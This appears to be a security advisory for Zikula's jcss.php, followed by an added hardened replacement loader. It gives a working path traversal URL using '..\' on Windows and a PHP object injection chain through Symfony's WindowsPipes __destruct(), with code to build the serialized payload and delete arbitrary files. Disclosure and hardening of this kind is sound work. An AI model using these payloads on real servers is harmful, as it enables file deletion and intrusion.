The relevant code in ./jcss.php (quoted as-is; the behaviour described below depends on it):

```php
// Vulnerable handler from jcss.php as quoted in the report (behaviour unchanged).
$f = (isset($_GET['f']) ? filter_var($_GET['f'], FILTER_SANITIZE_STRING) : false);
if (!$f) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
// clean $f: only forward slashes are stripped, backslashes survive
$f = preg_replace('`/`', '', $f);
// set full path to the file
$f = $ZConfig['System']['temp'] . '/Theme_cache/' . $f;
if (!is_readable($f)) {
    header('HTTP/1.0 400 Bad request');
    die('ERROR: Requested file not readable.');
}
// child lock
$signingKey = md5(serialize($ZConfig['DBInfo']['databases']['default']));
$contents = file_get_contents($f);
if (!DataUtil::is_serialized($contents, false)) {
    header('HTTP/1.0 500 Internal error');
    die('ERROR: Corrupted file.');
}
// file contents are unserialized without restricting the allowed classes
$dataArray = unserialize($contents);
```
On the Windows platform we can bypass the regex filter with `..\`.

PoC: `http://localhost/zikula4/jcss.php?f=..\..\..\..\..\jcss.php`

The result of `file_get_contents()` is passed into `unserialize()`; when `unserialize()` is used on user-supplied data it often leads to PHP Object Injection.

Here we can launch further attacks with `__destruct()` in `./vendor/symfony/symfony/src/Symfony/Component/Process/Pipes/WindowsPipes.php`.

PoC: delete files on a Windows server.
Add a public function to the class `WindowsPipes`:

```php
public function setattr() {
    $this->files = array('D:\phpStudy\WWW\zikula4\userdata\delete.txt'); // file you want to delete
    $this->fileHandles = array();
}
```
Serialize a `WindowsPipes` object and write it to a file:

```php
$obj = new WindowsPipes(true, null);
$obj->setattr();
file_put_contents('./exp.txt', serialize($obj));
```
Upload `exp.txt` to the `./userdata` folder on the Windows server.

Then request `http://localhost/zikula4/jcss.php?f=..\..\..\..\..\userdata\exp.txt`, and your target file will be deleted (`D:\phpStudy\WWW\zikula4\userdata\delete.txt` in my test).
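For comparison, the following is an added example of how the same file-loading logic can be hardened against both problems in the report (separator-agnostic traversal and unrestricted `unserialize()`). It is not Zikula's code and not part of the report; it only assumes the `$ZConfig['System']['temp']` layout shown in the quoted snippet, and the `load_theme_cache_file()` function name and its return convention are the example's own.

```php
<?php
// Added example (not Zikula's code): hardened variant of the jcss.php loader.
// Assumes the $ZConfig['System']['temp'] layout from the quoted snippet.
function load_theme_cache_file(array $ZConfig, ?string $requested): array
{
    $cacheDir = realpath($ZConfig['System']['temp'] . '/Theme_cache');
    if ($cacheDir === false) {
        return [500, 'ERROR: Cache directory missing.'];
    }

    // 1. Accept only a bare file name. basename() strips '\' as a separator
    //    on Windows but not on POSIX, so '/', '\' and NUL are rejected
    //    explicitly; this closes the "..\" bypass on every platform.
    if ($requested === null || $requested === ''
        || $requested !== basename($requested)
        || strpbrk($requested, "/\\\0") !== false
        || $requested === '.' || $requested === '..') {
        return [404, 'Not Found'];
    }

    // 2. Resolve the final path and confirm it is still inside Theme_cache.
    //    realpath() collapses '..' and follows symlinks, so a link that
    //    points outside the cache directory is rejected as well.
    $path = realpath($cacheDir . DIRECTORY_SEPARATOR . $requested);
    $prefix = $cacheDir . DIRECTORY_SEPARATOR;
    if ($path === false || !is_file($path) || !is_readable($path)
        || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return [400, 'ERROR: Requested file not readable.'];
    }

    $contents = file_get_contents($path);

    // 3. Forbid object instantiation during unserialize (PHP >= 7.0). Any
    //    serialized object becomes __PHP_Incomplete_Class, so no
    //    __destruct()/__wakeup() of application or vendor classes can run.
    $dataArray = @unserialize($contents, ['allowed_classes' => false]);
    if ($dataArray === false && $contents !== serialize(false)) {
        return [500, 'ERROR: Corrupted file.'];
    }
    if (!is_array($dataArray)) {
        return [500, 'ERROR: Unexpected cache format.'];
    }
    return [200, $dataArray];
}

// Demonstration with a temporary cache directory and constructed input.
$tmp = sys_get_temp_dir() . '/zk_demo_' . bin2hex(random_bytes(4));
mkdir($tmp . '/Theme_cache', 0700, true);
file_put_contents($tmp . '/Theme_cache/ok.txt', serialize(['color' => 'red']));
file_put_contents($tmp . '/Theme_cache/obj.txt', 'O:8:"stdClass":0:{}');
$cfg = ['System' => ['temp' => $tmp]];

var_dump(load_theme_cache_file($cfg, 'ok.txt')[0]);            // int(200)
var_dump(load_theme_cache_file($cfg, '..\\..\\jcss.php')[0]);  // int(404), also on Linux
var_dump(load_theme_cache_file($cfg, '../ok.txt')[0]);         // int(404)
var_dump(load_theme_cache_file($cfg, 'obj.txt')[0]);           // int(500): object, not array
```

The three checks are independent: the name whitelist stops traversal regardless of platform separator, the `realpath()` prefix comparison catches anything that still escapes the directory (for example through a symlink), and `allowed_classes => false` removes the object-injection sink entirely, so even a serialized object that does reach the loader cannot trigger a gadget's `__destruct()`.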